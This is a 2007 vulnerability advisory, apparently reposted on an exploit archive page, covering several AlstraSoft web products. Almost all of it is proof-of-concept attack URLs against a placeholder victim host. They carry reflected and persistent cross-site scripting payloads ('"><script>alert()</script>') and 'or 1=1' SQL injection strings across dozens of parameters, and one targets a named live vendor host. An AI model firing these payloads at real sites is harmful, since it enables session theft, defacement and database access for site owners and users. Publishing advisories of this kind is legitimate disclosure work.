Home / exploits alstrasoft-multi.txt
Posted on 23 July 2007
#################################################### AlstraSoft Multiple products multiple Vulnerabilities Vendor urL:http://www.alstrasoft.com/products.htm Advisore url:http://lostmon.blogspot.com/2007/07/ alstrasoft-multiple-products-multiple.html Vendor notify:yes (webform) Exploit included: yes #################################################### Multiple products of Alstrasoft Are prone vulnerables to Cross site scripting and SQL injections style attacks ################ examples ################ For exploit some flaws you need to login multiple other variables are afected y all products :S ##################################### AlstraSoft Video Share Enterprise ##################################### http://[Victim]/videoshare/view_video.php?viewkey= 9c1d0e3b9ccc3ab651bc&msg=Your+feature+request+is+ sent+"><script>alert()</script> http://[Victim]/videoshare/view_video.php?viewkey= 9c1d0e3b9ccc3ab651bc&page=10">&viewtype=&category=mr http://[Victim]/videoshare/view_video.php?viewkey= 9c1d0e3b9ccc3ab651bc"><script>alert()</script> http://[Victim]/videoshare/signup.php? next=upload"><script>alert()</script> http://[Victim]/videoshare/search_result.php? search_id=ghgdgdfd"><script>alert()</script> http://[Victim]/videoshare/view_video.php? viewkey=d9607ee5a9d336962c53&page=1&viewtype=">&category=mr http://[Victim]/videoshare/video.php? category=tf"><script>alert()</script>&viewtype= http://[Victim]/videoshare/video.php? page=5"><script>alert()</script> http://[Victim]/videoshare/compose.php? receiver=demo"><script>alert()</script> http://[Victim]/videoshare/groups.php? b=ra&catgy=Recently%20Added"><script>alert()</script> http://[Victim]/videoshare/siteadmin/ channels.php?a=Search&channelid=&channelname=%22 %3E%3Cscript%3Ealert%28%29%3C%2Fscript%3E&search=Search http://[Victim]/videoshare/siteadmin/muser.php? email=sanam11sa@hotmail.com&uname=GLAMOROUS"><script>alert()</script> path disclosure: http://[Victim]/videoshare/uprofile.php? UID=53"><script>alert()</script> http://[Victim]/videoshare/channel_detail.php? chid=24"><script>alert()</script> http://[Victim]/videoshare/uvideos.php?UID=53 "><script>alert()</script> http://[Victim]/videoshare/view_video.php? viewkey=d9607ee5a9d336962c53&page=1&viewtype=&category=mr' http://[Victim]/videoshare/groups_home.php?urlkey= RSL"><script>alert()</script> http://[Victim]/videoshare/ufriends.php?UID=253 "><script>alert()</script> SQL injection : http://[Victim]/videoshare/gmembers.php?urlkey=gshahzad&gid=9%20or%201=1 http://[Victim]/videoshare/uvideos.php?UID=253%20or%201=1 http://[Victim]/videoshare/ugroups.php?UID=253%20or%201=1 http://[Victim]/videoshare/uprofile.php?UID=253%20or%201=1 http://[Victim]/videoshare/uvideos.php?UID=253%20or%201=1&type=public http://[Victim]/videoshare/uvideos.php?UID=253%20or%201=1&type=private http://[Victim]/videoshare/ufavour.php?UID=253 or 1=1 http://[Victim]/videoshare/ufriends.php?UID=253 or 1=1 http://[Victim]/videoshare/uplaylist.php?UID=253 or 1=1 http://[Victim]/videoshare/ugroups.php?UID=253 or 1=1 ########################################### AlstraSoft Text Ads Enterprise ########################################### http://[Victim]/ads/forgot_uid.php?r=1"><script>alert()</script> http://[Victim]/ads/search_results.php?query="><script>alert()</script> http://[Victim]/ads/search_results.php?query=lala&sk=AlexaRating"><script>alert()</script> http://[Victim]/ads/website_page.php?pageId=1004"><script>alert()</script> ######################################### AlstraSoft SMS Text Messaging Enterprise ######################################## http://[Victim]/admin/membersearch.php?pagina=17&q= la&domain=Walltrapas.es%22%3E%3Cscript%3Ealert%28%29%3C%2Fscript%3E http://[Victim]/admin/edituser.php?userid= Walltrapas"><script>alert()</script> http://[Victim]/admin/membersearch.php? q=%22%3E%3Cscript%3Ealert%28%29%3C%2Fscript%3E&B1=Submit ################################################# e-friends http://alstrahost.com/friends/index.php?mode= people_card&p_id=927"><script>alert()</script> this is a persistent XSS ######################################## AlstraSoft Affiliate Network Pro ######################################## http://[Victim]/affiliate/merchants/index.php? Act=programedit&mode=edit&id=42"><script>alert()</script> http://[Victim]/affiliate/merchants/index.php?Act= programedit&mode=edit&id=42&msg=Program%20Edited%20Success fully"><script>alert()</script> http://[Victim]/affiliate/merchants/index.php?Act= uploadProducts&pgmid=41%20or%201=1 // SQL And XSS http://[Victim]/affiliate/merchants/index.php?Act= daily&d=9&m=07&y=2007 // all variables XSS affected except Act http://[Victim]/affiliate/merchants/index.php?Act= ProgramReport&programs=All&err=Please%20Enter%20Valid%20Date "><script>alert()</script> http://[Victim]/affiliate/merchants/index.php?Act= LinkReport&sub=View&i=1&txtto=17/07/2007&txtfrom=12/07/2007 &programs=All // all variables XSS affceted except Act y sub http://[Victim]/affiliate/merchants/temp.php?rowid= 5"><script>alert()</script> // posible SQL too http://[Victim]/affiliate/merchants/index.php?Act= add_money&msg=Please%20Enter%20A%20valid%20amount"><script>alert()</script> &modofpay=Authorize.net&bankname=&bankno=& bankemail=&bankaccount=&payableto=&minimumcheck=&affiliateid= #################################### AlstraSoft Article Manager Pro #################################### http://[Victim]/article/contact_author.php? userid=1%20"><script>alert()</script> ####################################### AlstraSoft AskMe Pro ####################################### http://[Victim]/ask/forum_answer.php?que_id=85%20or%201=1 // SQL http://[Victim]/ask/search.php?cat_id=14-18%20or%201=1 // SQL http://[Victim]/ask/search.php?status=Pending&cat_id="><script>alert()</script> http://[Victim]/ask/search.php?status=Pending&cat_id=1%20or%201=1 // SQL http://[Victim]/ask/register.php?typ=expert"><script>alert()</script> ######################